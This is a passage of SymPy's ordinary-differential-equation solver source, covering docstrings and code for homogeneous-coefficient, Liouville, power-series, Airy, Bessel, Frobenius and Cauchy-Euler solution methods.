/ x \ / x \ d
g|----| + h|----|*--(f(x))
\f(x)/ \f(x)/ dx
>>> pprint(dsolve(genform, f(x),
... hint='1st_homogeneous_coeff_subs_indep_div_dep_Integral'))
x
----
f(x)
/
|
| -g(u2)
| ---------------- d(u2)
| u2*g(u2) + h(u2)
|
/
<BLANKLINE>
f(x) = C1*e
Where `u_2 g(u_2) + h(u_2) \ne 0` and `f(x) \ne 0`.
See also the docstrings of
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_best` and
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_dep_div_indep`.
Examples
========
>>> from sympy import Function, pprint, dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(2*x*f(x) + (x**2 + f(x)**2)*f(x).diff(x), f(x),
... hint='1st_homogeneous_coeff_subs_indep_div_dep',
... simplify=False))
/ 2 \
| 3*x |
log|----- + 1|
| 2 |
\f (x) /
log(f(x)) = log(C1) - --------------
3
References
==========
- https://en.wikipedia.org/wiki/Homogeneous_differential_equation
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 59
# indirect doctest
"""
x = func.args[0]
f = func.func
u = Dummy('u')
u2 = Dummy('u2') # u2 == x/f(x)
r = match # d+e*diff(f(x),x)
C1 = get_numbered_constants(eq, num=1)
xarg = match.get('xarg', 0) # If xarg present take xarg, else zero
yarg = match.get('yarg', 0) # If yarg present take yarg, else zero
int = Integral(
simplify(
(-r[r['d']]/(r[r['e']] + u2*r[r['d']])).subs({x: u2, r['y']: 1})),
(u2, None, x/f(x)))
sol = logcombine(Eq(log(f(x)), int + log(C1)), force=True)
sol = sol.subs(f(x), u).subs(((u, u - yarg), (x, x - xarg), (u, f(x))))
return sol
# XXX: Should this function maybe go somewhere else?
def homogeneous_order(eq, *symbols):
r"""
Returns the order `n` if `g` is homogeneous and ``None`` if it is not
homogeneous.
Determines if a function is homogeneous and if so of what order. A
function `f(x, y, \cdots)` is homogeneous of order `n` if `f(t x, t y,
\cdots) = t^n f(x, y, \cdots)`.
If the function is of two variables, `F(x, y)`, then `f` being homogeneous
of any order is equivalent to being able to rewrite `F(x, y)` as `G(x/y)`
or `H(y/x)`. This fact is used to solve 1st order ordinary differential
equations whose coefficients are homogeneous of the same order (see the
docstrings of
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_dep_div_indep` and
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_indep_div_dep`).
Symbols can be functions, but every argument of the function must be a
symbol, and the arguments of the function that appear in the expression
must match those given in the list of symbols. If a declared function
appears with different arguments than given in the list of symbols,
``None`` is returned.
Examples
========
>>> from sympy import Function, homogeneous_order, sqrt
>>> from sympy.abc import x, y
>>> f = Function('f')
>>> homogeneous_order(f(x), f(x)) is None
True
>>> homogeneous_order(f(x,y), f(y, x), x, y) is None
True
>>> homogeneous_order(f(x), f(x), x)
1
>>> homogeneous_order(x**2*f(x)/sqrt(x**2+f(x)**2), x, f(x))
2
>>> homogeneous_order(x**2+f(x), x, f(x)) is None
True
"""
if not symbols:
raise ValueError("homogeneous_order: no symbols were given.")
symset = set(symbols)
eq = sympify(eq)
# The following are not supported
if eq.has(Order, Derivative):
return None
# These are all constants
if (eq.is_Number or
eq.is_NumberSymbol or
eq.is_number
):
return S.Zero
# Replace all functions with dummy variables
dum = numbered_symbols(prefix='d', cls=Dummy)
newsyms = set()
for i in [j for j in symset if getattr(j, 'is_Function')]:
iargs = set(i.args)
if iargs.difference(symset):
return None
else:
dummyvar = next(dum)
eq = eq.subs(i, dummyvar)
symset.remove(i)
newsyms.add(dummyvar)
symset.update(newsyms)
if not eq.free_symbols & symset:
return None
# assuming order of a nested function can only be equal to zero
if isinstance(eq, Function):
return None if homogeneous_order(
eq.args[0], *tuple(symset)) != 0 else S.Zero
# make the replacement of x with x*t and see if t can be factored out
t = Dummy('t', positive=True) # It is sufficient that t > 0
eqs = separatevars(eq.subs([(i, t*i) for i in symset]), [t], dict=True)[t]
if eqs is S.One:
return S.Zero # there was no term with only t
i, d = eqs.as_independent(t, as_Add=False)
b, e = d.as_base_exp()
if b == t:
return e
def ode_Liouville(eq, func, order, match):
r"""
Solves 2nd order Liouville differential equations.
The general form of a Liouville ODE is
.. math:: \frac{d^2 y}{dx^2} + g(y) \left(\!
\frac{dy}{dx}\!\right)^2 + h(x)
\frac{dy}{dx}\text{.}
The general solution is:
>>> from sympy import Function, dsolve, Eq, pprint, diff
>>> from sympy.abc import x
>>> f, g, h = map(Function, ['f', 'g', 'h'])
>>> genform = Eq(diff(f(x),x,x) + g(f(x))*diff(f(x),x)**2 +
... h(x)*diff(f(x),x), 0)
>>> pprint(genform)
2 2
/d \ d d
g(f(x))*|--(f(x))| + h(x)*--(f(x)) + ---(f(x)) = 0
\dx / dx 2
dx
>>> pprint(dsolve(genform, f(x), hint='Liouville_Integral'))
f(x)
/ /
| |
| / | /
| | | |
| - | h(x) dx | | g(y) dy
| | | |
| / | /
C1 + C2* | e dx + | e dy = 0
| |
/ /
Examples
========
>>> from sympy import Function, dsolve, Eq, pprint
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(diff(f(x), x, x) + diff(f(x), x)**2/f(x) +
... diff(f(x), x)/x, f(x), hint='Liouville'))
________________ ________________
[f(x) = -\/ C1 + C2*log(x) , f(x) = \/ C1 + C2*log(x) ]
References
==========
- Goldstein and Braun, "Advanced Methods for the Solution of Differential
Equations", pp. 98
- http://www.maplesoft.com/support/help/Maple/view.aspx?path=odeadvisor/Liouville
# indirect doctest
"""
# Liouville ODE:
# f(x).diff(x, 2) + g(f(x))*(f(x).diff(x, 2))**2 + h(x)*f(x).diff(x)
# See Goldstein and Braun, "Advanced Methods for the Solution of
# Differential Equations", pg. 98, as well as
# http://www.maplesoft.com/support/help/view.aspx?path=odeadvisor/Liouville
x = func.args[0]
f = func.func
r = match # f(x).diff(x, 2) + g*f(x).diff(x)**2 + h*f(x).diff(x)
y = r['y']
C1, C2 = get_numbered_constants(eq, num=2)
int = Integral(exp(Integral(r['g'], y)), (y, None, f(x)))
sol = Eq(int + C1*Integral(exp(-Integral(r['h'], x)), x) + C2, 0)
return sol
def ode_2nd_power_series_ordinary(eq, func, order, match):
r"""
Gives a power series solution to a second order homogeneous differential
equation with polynomial coefficients at an ordinary point. A homogeneous
differential equation is of the form
.. math :: P(x)\frac{d^2y}{dx^2} + Q(x)\frac{dy}{dx} + R(x) = 0
For simplicity it is assumed that `P(x)`, `Q(x)` and `R(x)` are polynomials,
it is sufficient that `\frac{Q(x)}{P(x)}` and `\frac{R(x)}{P(x)}` exists at
`x_{0}`. A recurrence relation is obtained by substituting `y` as `\sum_{n=0}^\infty a_{n}x^{n}`,
in the differential equation, and equating the nth term. Using this relation
various terms can be generated.
Examples
========
>>> from sympy import dsolve, Function, pprint
>>> from sympy.abc import x
>>> f = Function("f")
>>> eq = f(x).diff(x, 2) + f(x)
>>> pprint(dsolve(eq, hint='2nd_power_series_ordinary'))
/ 4 2 \ / 2\
|x x | | x | / 6\
f(x) = C2*|-- - -- + 1| + C1*x*|1 - --| + O\x /
\24 2 / \ 6 /
References
==========
- http://tutorial.math.lamar.edu/Classes/DE/SeriesSolutions.aspx
- George E. Simmons, "Differential Equations with Applications and
Historical Notes", p.p 176 - 184
"""
x = func.args[0]
f = func.func
C0, C1 = get_numbered_constants(eq, num=2)
n = Dummy("n", integer=True)
s = Wild("s")
k = Wild("k", exclude=[x])
x0 = match.get('x0')
terms = match.get('terms', 5)
p = match[match['a3']]
q = match[match['b3']]
r = match[match['c3']]
seriesdict = {}
recurr = Function("r")
# Generating the recurrence relation which works this way:
# for the second order term the summation begins at n = 2. The coefficients
# p is multiplied with an*(n - 1)*(n - 2)*x**n-2 and a substitution is made such that
# the exponent of x becomes n.
# For example, if p is x, then the second degree recurrence term is
# an*(n - 1)*(n - 2)*x**n-1, substituting (n - 1) as n, it transforms to
# an+1*n*(n - 1)*x**n.
# A similar process is done with the first order and zeroth order term.
coefflist = [(recurr(n), r), (n*recurr(n), q), (n*(n - 1)*recurr(n), p)]
for index, coeff in enumerate(coefflist):
if coeff[1]:
f2 = powsimp(expand((coeff[1]*(x - x0)**(n - index)).subs(x, x + x0)))
if f2.is_Add:
addargs = f2.args
else:
addargs = [f2]
for arg in addargs:
powm = arg.match(s*x**k)
term = coeff[0]*powm[s]
if not powm[k].is_Symbol:
term = term.subs(n, n - powm[k].as_independent(n)[0])
startind = powm[k].subs(n, index)
# Seeing if the startterm can be reduced further.
# If it vanishes for n lesser than startind, it is
# equal to summation from n.
if startind:
for i in reversed(range(startind)):
if not term.subs(n, i):
seriesdict[term] = i
else:
seriesdict[term] = i + 1
break
else:
seriesdict[term] = S.Zero
# Stripping of terms so that the sum starts with the same number.
teq = S.Zero
suminit = seriesdict.values()
rkeys = seriesdict.keys()
req = Add(*rkeys)
if any(suminit):
maxval = max(suminit)
for term in seriesdict:
val = seriesdict[term]
if val != maxval:
for i in range(val, maxval):
teq += term.subs(n, val)
finaldict = {}
if teq:
fargs = teq.atoms(AppliedUndef)
if len(fargs) == 1:
finaldict[fargs.pop()] = 0
else:
maxf = max(fargs, key = lambda x: x.args[0])
sol = solve(teq, maxf)
if isinstance(sol, list):
sol = sol[0]
finaldict[maxf] = sol
# Finding the recurrence relation in terms of the largest term.
fargs = req.atoms(AppliedUndef)
maxf = max(fargs, key = lambda x: x.args[0])
minf = min(fargs, key = lambda x: x.args[0])
if minf.args[0].is_Symbol:
startiter = 0
else:
startiter = -minf.args[0].as_independent(n)[0]
lhs = maxf
rhs = solve(req, maxf)
if isinstance(rhs, list):
rhs = rhs[0]
# Checking how many values are already present
tcounter = len([t for t in finaldict.values() if t])
for _ in range(tcounter, terms - 3): # Assuming c0 and c1 to be arbitrary
check = rhs.subs(n, startiter)
nlhs = lhs.subs(n, startiter)
nrhs = check.subs(finaldict)
finaldict[nlhs] = nrhs
startiter += 1
# Post processing
series = C0 + C1*(x - x0)
for term in finaldict:
if finaldict[term]:
fact = term.args[0]
series += (finaldict[term].subs([(recurr(0), C0), (recurr(1), C1)])*(
x - x0)**fact)
series = collect(expand_mul(series), [C0, C1]) + Order(x**terms)
return Eq(f(x), series)
def ode_2nd_linear_airy(eq, func, order, match):
r"""
Gives solution of the Airy differential equation
.. math :: \frac{d^2y}{dx^2} + (a + b x) y(x) = 0
in terms of Airy special functions airyai and airybi.
Examples
========
>>> from sympy import dsolve, Function
>>> from sympy.abc import x
>>> f = Function("f")
>>> eq = f(x).diff(x, 2) - x*f(x)
>>> dsolve(eq)
Eq(f(x), C1*airyai(x) + C2*airybi(x))
"""
x = func.args[0]
f = func.func
C0, C1 = get_numbered_constants(eq, num=2)
b = match['b']
m = match['m']
if m.is_positive:
arg = - b/cbrt(m)**2 - cbrt(m)*x
elif m.is_negative:
arg = - b/cbrt(-m)**2 + cbrt(-m)*x
else:
arg = - b/cbrt(-m)**2 + cbrt(-m)*x
return Eq(f(x), C0*airyai(arg) + C1*airybi(arg))
def ode_2nd_power_series_regular(eq, func, order, match):
r"""
Gives a power series solution to a second order homogeneous differential
equation with polynomial coefficients at a regular point. A second order
homogeneous differential equation is of the form
.. math :: P(x)\frac{d^2y}{dx^2} + Q(x)\frac{dy}{dx} + R(x) = 0
A point is said to regular singular at `x0` if `x - x0\frac{Q(x)}{P(x)}`
and `(x - x0)^{2}\frac{R(x)}{P(x)}` are analytic at `x0`. For simplicity
`P(x)`, `Q(x)` and `R(x)` are assumed to be polynomials. The algorithm for
finding the power series solutions is:
1. Try expressing `(x - x0)P(x)` and `((x - x0)^{2})Q(x)` as power series
solutions about x0. Find `p0` and `q0` which are the constants of the
power series expansions.
2. Solve the indicial equation `f(m) = m(m - 1) + m*p0 + q0`, to obtain the
roots `m1` and `m2` of the indicial equation.
3. If `m1 - m2` is a non integer there exists two series solutions. If
`m1 = m2`, there exists only one solution. If `m1 - m2` is an integer,
then the existence of one solution is confirmed. The other solution may
or may not exist.
The power series solution is of the form `x^{m}\sum_{n=0}^\infty a_{n}x^{n}`. The
coefficients are determined by the following recurrence relation.
`a_{n} = -\frac{\sum_{k=0}^{n-1} q_{n-k} + (m + k)p_{n-k}}{f(m + n)}`. For the case
in which `m1 - m2` is an integer, it can be seen from the recurrence relation
that for the lower root `m`, when `n` equals the difference of both the
roots, the denominator becomes zero. So if the numerator is not equal to zero,
a second series solution exists.
Examples
========
>>> from sympy import dsolve, Function, pprint
>>> from sympy.abc import x
>>> f = Function("f")
>>> eq = x*(f(x).diff(x, 2)) + 2*(f(x).diff(x)) + x*f(x)
>>> pprint(dsolve(eq, hint='2nd_power_series_regular'))
/ 6 4 2 \
| x x x |
/ 4 2 \ C1*|- --- + -- - -- + 1|
| x x | \ 720 24 2 / / 6\
f(x) = C2*|--- - -- + 1| + ------------------------ + O\x /
\120 6 / x
References
==========
- George E. Simmons, "Differential Equations with Applications and
Historical Notes", p.p 176 - 184
"""
x = func.args[0]
f = func.func
C0, C1 = get_numbered_constants(eq, num=2)
m = Dummy("m") # for solving the indicial equation
x0 = match.get('x0')
terms = match.get('terms', 5)
p = match['p']
q = match['q']
# Generating the indicial equation
indicial = []
for term in [p, q]:
if not term.has(x):
indicial.append(term)
else:
term = series(term, n=1, x0=x0)
if isinstance(term, Order):
indicial.append(S.Zero)
else:
for arg in term.args:
if not arg.has(x):
indicial.append(arg)
break
p0, q0 = indicial
sollist = solve(m*(m - 1) + m*p0 + q0, m)
if sollist and isinstance(sollist, list) and all(
[sol.is_real for sol in sollist]):
serdict1 = {}
serdict2 = {}
if len(sollist) == 1:
# Only one series solution exists in this case.
m1 = m2 = sollist.pop()
if terms-m1-1 <= 0:
return Eq(f(x), Order(terms))
serdict1 = _frobenius(terms-m1-1, m1, p0, q0, p, q, x0, x, C0)
else:
m1 = sollist[0]
m2 = sollist[1]
if m1 < m2:
m1, m2 = m2, m1
# Irrespective of whether m1 - m2 is an integer or not, one
# Frobenius series solution exists.
serdict1 = _frobenius(terms-m1-1, m1, p0, q0, p, q, x0, x, C0)
if not (m1 - m2).is_integer:
# Second frobenius series solution exists.
serdict2 = _frobenius(terms-m2-1, m2, p0, q0, p, q, x0, x, C1)
else:
# Check if second frobenius series solution exists.
serdict2 = _frobenius(terms-m2-1, m2, p0, q0, p, q, x0, x, C1, check=m1)
if serdict1:
finalseries1 = C0
for key in serdict1:
power = int(key.name[1:])
finalseries1 += serdict1[key]*(x - x0)**power
finalseries1 = (x - x0)**m1*finalseries1
finalseries2 = S.Zero
if serdict2:
for key in serdict2:
power = int(key.name[1:])
finalseries2 += serdict2[key]*(x - x0)**power
finalseries2 += C1
finalseries2 = (x - x0)**m2*finalseries2
return Eq(f(x), collect(finalseries1 + finalseries2,
[C0, C1]) + Order(x**terms))
def ode_2nd_linear_bessel(eq, func, order, match):
r"""
Gives solution of the Bessel differential equation
.. math :: x^2 \frac{d^2y}{dx^2} + x \frac{dy}{dx} y(x) + (x^2-n^2) y(x)
if n is integer then the solution is of the form Eq(f(x), C0 besselj(n,x)
+ C1 bessely(n,x)) as both the solutions are linearly independent else if
n is a fraction then the solution is of the form Eq(f(x), C0 besselj(n,x)
+ C1 besselj(-n,x)) which can also transform into Eq(f(x), C0 besselj(n,x)
+ C1 bessely(n,x)).
Examples
========
>>> from sympy.abc import x
>>> from sympy import Symbol
>>> v = Symbol('v', positive=True)
>>> from sympy.solvers.ode import dsolve
>>> from sympy import Function
>>> f = Function('f')
>>> y = f(x)
>>> genform = x**2*y.diff(x, 2) + x*y.diff(x) + (x**2 - v**2)*y
>>> dsolve(genform)
Eq(f(x), C1*besselj(v, x) + C2*bessely(v, x))
References
==========
https://www.math24.net/bessel-differential-equation/
"""
x = func.args[0]
f = func.func
C0, C1 = get_numbered_constants(eq, num=2)
n = match['n']
a4 = match['a4']
c4 = match['c4']
d4 = match['d4']
b4 = match['b4']
n = sqrt(n**2 + Rational(1, 4)*(c4 - 1)**2)
return Eq(f(x), ((x**(Rational(1-c4,2)))*(C0*besselj(n/d4,a4*x**d4/d4)
+ C1*bessely(n/d4,a4*x**d4/d4))).subs(x, x-b4))
def _frobenius(n, m, p0, q0, p, q, x0, x, c, check=None):
r"""
Returns a dict with keys as coefficients and values as their values in terms of C0
"""
n = int(n)
# In cases where m1 - m2 is not an integer
m2 = check
d = Dummy("d")
numsyms = numbered_symbols("C", start=0)
numsyms = [next(numsyms) for i in range(n + 1)]
serlist = []
for ser in [p, q]:
# Order term not present
if ser.is_polynomial(x) and Poly(ser, x).degree() <= n:
if x0:
ser = ser.subs(x, x + x0)
dict_ = Poly(ser, x).as_dict()
# Order term present
else:
tseries = series(ser, x=x0, n=n+1)
# Removing order
dict_ = Poly(list(ordered(tseries.args))[: -1], x).as_dict()
# Fill in with zeros, if coefficients are zero.
for i in range(n + 1):
if (i,) not in dict_:
dict_[(i,)] = S.Zero
serlist.append(dict_)
pseries = serlist[0]
qseries = serlist[1]
indicial = d*(d - 1) + d*p0 + q0
frobdict = {}
for i in range(1, n + 1):
num = c*(m*pseries[(i,)] + qseries[(i,)])
for j in range(1, i):
sym = Symbol("C" + str(j))
num += frobdict[sym]*((m + j)*pseries[(i - j,)] + qseries[(i - j,)])
# Checking for cases when m1 - m2 is an integer. If num equals zero
# then a second Frobenius series solution cannot be found. If num is not zero
# then set constant as zero and proceed.
if m2 is not None and i == m2 - m:
if num:
return False
else:
frobdict[numsyms[i]] = S.Zero
else:
frobdict[numsyms[i]] = -num/(indicial.subs(d, m+i))
return frobdict
def _nth_order_reducible_match(eq, func):
r"""
Matches any differential equation that can be rewritten with a smaller
order. Only derivatives of ``func`` alone, wrt a single variable,
are considered, and only in them should ``func`` appear.
"""
# ODE only handles functions of 1 variable so this affirms that state
assert len(func.args) == 1
x = func.args[0]
vc = [d.variable_count[0] for d in eq.atoms(Derivative)
if d.expr == func and len(d.variable_count) == 1]
ords = [c for v, c in vc if v == x]
if len(ords) < 2:
return
smallest = min(ords)
# make sure func does not appear outside of derivatives
D = Dummy()
if eq.subs(func.diff(x, smallest), D).has(func):
return
return {'n': smallest}
def ode_nth_order_reducible(eq, func, order, match):
r"""
Solves ODEs that only involve derivatives of the dependent variable using
a substitution of the form `f^n(x) = g(x)`.
For example any second order ODE of the form `f''(x) = h(f'(x), x)` can be
transformed into a pair of 1st order ODEs `g'(x) = h(g(x), x)` and
`f'(x) = g(x)`. Usually the 1st order ODE for `g` is easier to solve. If
that gives an explicit solution for `g` then `f` is found simply by
integration.
Examples
========
>>> from sympy import Function, dsolve, Eq
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = Eq(x*f(x).diff(x)**2 + f(x).diff(x, 2), 0)
>>> dsolve(eq, f(x), hint='nth_order_reducible')
... # doctest: +NORMALIZE_WHITESPACE
Eq(f(x), C1 - sqrt(-1/C2)*log(-C2*sqrt(-1/C2) + x) + sqrt(-1/C2)*log(C2*sqrt(-1/C2) + x))
"""
x = func.args[0]
f = func.func
n = match['n']
# get a unique function name for g
names = [a.name for a in eq.atoms(AppliedUndef)]
while True:
name = Dummy().name
if name not in names:
g = Function(name)
break
w = f(x).diff(x, n)
geq = eq.subs(w, g(x))
gsol = dsolve(geq, g(x))
if not isinstance(gsol, list):
gsol = [gsol]
# Might be multiple solutions to the reduced ODE:
fsol = []
for gsoli in gsol:
fsoli = dsolve(gsoli.subs(g(x), w), f(x)) # or do integration n times
fsol.append(fsoli)
if len(fsol) == 1:
fsol = fsol[0]
return fsol
def _remove_redundant_solutions(eq, solns, order, var):
r"""
Remove redundant solutions from the set of solutions.
This function is needed because otherwise dsolve can return
redundant solutions. As an example consider:
eq = Eq((f(x).diff(x, 2))*f(x).diff(x), 0)
There are two ways to find solutions to eq. The first is to solve f(x).diff(x, 2) = 0
leading to solution f(x)=C1 + C2*x. The second is to solve the equation f(x).diff(x) = 0
leading to the solution f(x) = C1. In this particular case we then see
that the second solution is a special case of the first and we don't
want to return it.
This does not always happen. If we have
eq = Eq((f(x)**2-4)*(f(x).diff(x)-4), 0)
then we get the algebraic solution f(x) = [-2, 2] and the integral solution
f(x) = x + C1 and in this case the two solutions are not equivalent wrt
initial conditions so both should be returned.
"""
def is_special_case_of(soln1, soln2):
return _is_special_case_of(soln1, soln2, eq, order, var)
unique_solns = []
for soln1 in solns:
for soln2 in unique_solns[:]:
if is_special_case_of(soln1, soln2):
break
elif is_special_case_of(soln2, soln1):
unique_solns.remove(soln2)
else:
unique_solns.append(soln1)
return unique_solns
def _is_special_case_of(soln1, soln2, eq, order, var):
r"""
True if soln1 is found to be a special case of soln2 wrt some value of the
constants that appear in soln2. False otherwise.
"""
# The solutions returned by dsolve may be given explicitly or implicitly.
# We will equate the sol1=(soln1.rhs - soln1.lhs), sol2=(soln2.rhs - soln2.lhs)
# of the two solutions.
#
# Since this is supposed to hold for all x it also holds for derivatives.
# For an order n ode we should be able to differentiate
# each solution n times to get n+1 equations.
#
# We then try to solve those n+1 equations for the integrations constants
# in sol2. If we can find a solution that doesn't depend on x then it
# means that some value of the constants in sol1 is a special case of
# sol2 corresponding to a particular choice of the integration constants.
# In case the solution is in implicit form we subtract the sides
soln1 = soln1.rhs - soln1.lhs
soln2 = soln2.rhs - soln2.lhs
# Work for the series solution
if soln1.has(Order) and soln2.has(Order):
if soln1.getO() == soln2.getO():
soln1 = soln1.removeO()
soln2 = soln2.removeO()
else:
return False
elif soln1.has(Order) or soln2.has(Order):
return False
constants1 = soln1.free_symbols.difference(eq.free_symbols)
constants2 = soln2.free_symbols.difference(eq.free_symbols)
constants1_new = get_numbered_constants(Tuple(soln1, soln2), len(constants1))
if len(constants1) == 1:
constants1_new = {constants1_new}
for c_old, c_new in zip(constants1, constants1_new):
soln1 = soln1.subs(c_old, c_new)
# n equations for sol1 = sol2, sol1'=sol2', ...
lhs = soln1
rhs = soln2
eqns = [Eq(lhs, rhs)]
for n in range(1, order):
lhs = lhs.diff(var)
rhs = rhs.diff(var)
eq = Eq(lhs, rhs)
eqns.append(eq)
# BooleanTrue/False awkwardly show up for trivial equations
if any(isinstance(eq, BooleanFalse) for eq in eqns):
return False
eqns = [eq for eq in eqns if not isinstance(eq, BooleanTrue)]
try:
constant_solns = solve(eqns, constants2)
except NotImplementedError:
return False
# Sometimes returns a dict and sometimes a list of dicts
if isinstance(constant_solns, dict):
constant_solns = [constant_solns]
# after solving the issue 17418, maybe we don't need the following checksol code.
for constant_soln in constant_solns:
for eq in eqns:
eq=eq.rhs-eq.lhs
if checksol(eq, constant_soln) is not True:
return False
# If any solution gives all constants as expressions that don't depend on
# x then there exists constants for soln2 that give soln1
for constant_soln in constant_solns:
if not any(c.has(var) for c in constant_soln.values()):
return True
return False
def _nth_linear_match(eq, func, order):
r"""
Matches a differential equation to the linear form:
.. math:: a_n(x) y^{(n)} + \cdots + a_1(x)y' + a_0(x) y + B(x) = 0
Returns a dict of order:coeff terms, where order is the order of the
derivative on each term, and coeff is the coefficient of that derivative.
The key ``-1`` holds the function `B(x)`. Returns ``None`` if the ODE is
not linear. This function assumes that ``func`` has already been checked
to be good.
Examples
========
>>> from sympy import Function, cos, sin
>>> from sympy.abc import x
>>> from sympy.solvers.ode.ode import _nth_linear_match
>>> f = Function('f')
>>> _nth_linear_match(f(x).diff(x, 3) + 2*f(x).diff(x) +
... x*f(x).diff(x, 2) + cos(x)*f(x).diff(x) + x - f(x) -
... sin(x), f(x), 3)
{-1: x - sin(x), 0: -1, 1: cos(x) + 2, 2: x, 3: 1}
>>> _nth_linear_match(f(x).diff(x, 3) + 2*f(x).diff(x) +
... x*f(x).diff(x, 2) + cos(x)*f(x).diff(x) + x - f(x) -
... sin(f(x)), f(x), 3) == None
True
"""
x = func.args[0]
one_x = {x}
terms = {i: S.Zero for i in range(-1, order + 1)}
for i in Add.make_args(eq):
if not i.has(func):
terms[-1] += i
else:
c, f = i.as_independent(func)
if (isinstance(f, Derivative)
and set(f.variables) == one_x
and f.args[0] == func):
terms[f.derivative_count] += c
elif f == func:
terms[len(f.args[1:])] += c
else:
return None
return terms
def ode_nth_linear_euler_eq_homogeneous(eq, func, order, match, returns='sol'):
r"""
Solves an `n`\th order linear homogeneous variable-coefficient
Cauchy-Euler equidimensional ordinary differential equation.
This is an equation with form `0 = a_0 f(x) + a_1 x f'(x) + a_2 x^2 f''(x)
\cdots`.
These equations can be solved in a general manner, by substituting
solutions of the form `f(x) = x^r`, and deriving a characteristic equation
for `r`. When there are repeated roots, we include extra terms of the
form `C_{r k} \ln^k(x) x^r`, where `C_{r k}` is an arbitrary integration
constant, `r` is a root of the characteristic equation, and `k` ranges
over the multiplicity of `r`. In the cases where the roots are complex,
solutions of the form `C_1 x^a \sin(b \log(x)) + C_2 x^a \cos(b \log(x))`
are returned, based on expansions with Euler's formula. The general
solution is the sum of the terms found. If SymPy cannot find exact roots
to the characteristic equation, a
:py:obj:`~.ComplexRootOf` instance will be returned
instead.
>>> from sympy import Function, dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> dsolve(4*x**2*f(x).diff(x, 2) + f(x), f(x),
... hint='nth_linear_euler_eq_homogeneous')
... # doctest: +NORMALIZE_WHITESPACE
Eq(f(x), sqrt(x)*(C1 + C2*log(x)))
Note that because this method does not involve integration, there is no
``nth_linear_euler_eq_homogeneous_Integral`` hint.
The following is for internal use:
- ``returns = 'sol'`` returns the solution to the ODE.
- ``returns = 'list'`` returns a list of linearly independent solutions,
corresponding to the fundamental solution set, for use with non
homogeneous solution methods like variation of parameters and
undetermined coefficients. Note that, though the solutions should be
linearly independent, this function does not explicitly check that. You
can do ``assert simplify(wronskian(sollist)) != 0`` to check for linear
independence. Also, ``assert len(sollist) == order`` will need to pass.
- ``returns = 'both'``, return a dictionary ``{'sol': <solution to ODE>,
'list': <list of linearly independent solutions>}``.
Examples
========
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = f(x).diff(x, 2)*x**2 - 4*f(x).diff(x)*x + 6*f(x)
>>> pprint(dsolve(eq, f(x),
... hint='nth_linear_euler_eq_homogeneous'))
2
f(x) = x *(C1 + C2*x)
References
==========
- https://en.wikipedia.org/wiki/Cauchy%E2%80%93Euler_equation
- C. Bender & S. Orszag, "Advanced Mathematical Methods for Scientists and
Engineers", Springer 1999, pp. 12
# indirect doctest
"""
# XXX: This global collectterms hack should be removed.
global collectterms
collectterms = []
x = func.args[0]
f = func.func
r = match
# First, set up characteristic equation.
chareq, symbol = S.Zero, Dummy('x')
for i in r.keys():
if not isinstance(i, str) and i >= 0:
chareq += (r[i]*diff(x**symbol, x, i)*x**-symbol).expand()
chareq = Poly(chareq, symbol)
chareqroots = [rootof(chareq, k) for k in range(chareq.degree())]
# A generator of constants
constants = list(get_numbered_constants(eq, num=chareq.degree()*2))
constants.reverse()
# Create a dict root: multiplicity or charroots
charroots = defaultdict(int)
for root in chareqroots:
charroots[root] += 1
gsol = S.Zero
# We need keep track of terms so we can run collect() at the end.
# This is necessary for constantsimp to work properly.
ln = log
for root, multiplicity in charroots.items():
for i in range(multiplicity):
if isinstance(root, RootOf):
gsol += (x**root) * constants.pop()
if multiplicity != 1:
raise ValueError("Value should be 1")
collectterms = [(0, root, 0)] + collectterms
elif root.is_real:
gsol += ln(x)**i*(x**root) * constants.pop()
collectterms = [(i, root, 0)] + collectterms
else:
reroot = re(root)
imroot = im(root)
gsol += ln(x)**i * (x**reroot) * (
constants.pop() * sin(abs(imroot)*ln(x))
+ constants.pop() * cos(imroot*ln(x)))
# Preserve ordering (multiplicity, real part, imaginary part)
# It will be assumed implicitly when constructing
# fundamental solution sets.
collectterms = [(i, reroot, imroot)] + collectterms
if returns == 'sol':
return Eq(f(x), gsol)
elif returns in ('list' 'both'):
# HOW TO TEST THIS CODE? (dsolve does not pass 'returns' through)
# Create a list of (hopefully) linearly independent solutions
gensols = []
# Keep track of when to use sin or cos for nonzero imroot
for i, reroot, imroot in collectterms:
if imroot == 0:
gensols.append(ln(x)**i*x**reroot)
else:
sin_form = ln(x)**i*x**reroot*sin(abs(imroot)*ln(x))
if sin_form in gensols:
cos_form = ln(x)**i*x**reroot*cos(imroot*ln(x))
gensols.append(cos_form)
else:
gensols.append(sin_form)
if returns == 'list':
return gensols
else:
return {'sol': Eq(f(x), gsol), 'list': gensols}
else:
raise ValueError('Unknown value for key "returns".')
def ode_nth_linear_euler_eq_nonhomogeneous_undetermined_coefficients(eq, func, order, match, returns='sol'):
r"""
Solves an `n`\th order linear non homogeneous Cauchy-Euler equidimensional
ordinary differential equation using undetermined coefficients.
This is an equation with form `g(x) = a_0 f(x) + a_1 x f'(x) + a_2 x^2 f''(x)
\cdots`.
These equations can be solved in a general manner, by substituting
solutions of the form `x = exp(t)`, and deriving a characteristic equation
of form `g(exp(t)) = b_0 f(t) + b_1 f'(t) + b_2 f''(t) \cdots` which can
be then solved by nth_linear_constant_coeff_undetermined_coefficients if
g(exp(t)) has finite number of linearly independent derivatives.
Functions that fit this requirement are finite sums functions of the form
`a x^i e^{b x} \sin(c x + d)` or `a x^i e^{b x} \cos(c x + d)`, where `i`
is a non-negative integer and `a`, `b`, `c`, and `d` are constants. For
example any polynomial in `x`, functions like `x^2 e^{2 x}`, `x \sin(x)`,
and `e^x \cos(x)` can all be used. Products of `\sin`'s and `\cos`'s have
a finite number of derivatives, because they can be expanded into `\sin(a
x)` and `\cos(b x)` terms. However, SymPy currently cannot do that
expansion, so you will need to manually rewrite the expression in terms of
the above to use this method. So, for example, you will need to manually
convert `\sin^2(x)` into `(1 + \cos(2 x))/2` to properly apply the method
of undetermined coefficients on it.
After replacement of x by exp(t), this method works by creating a trial function
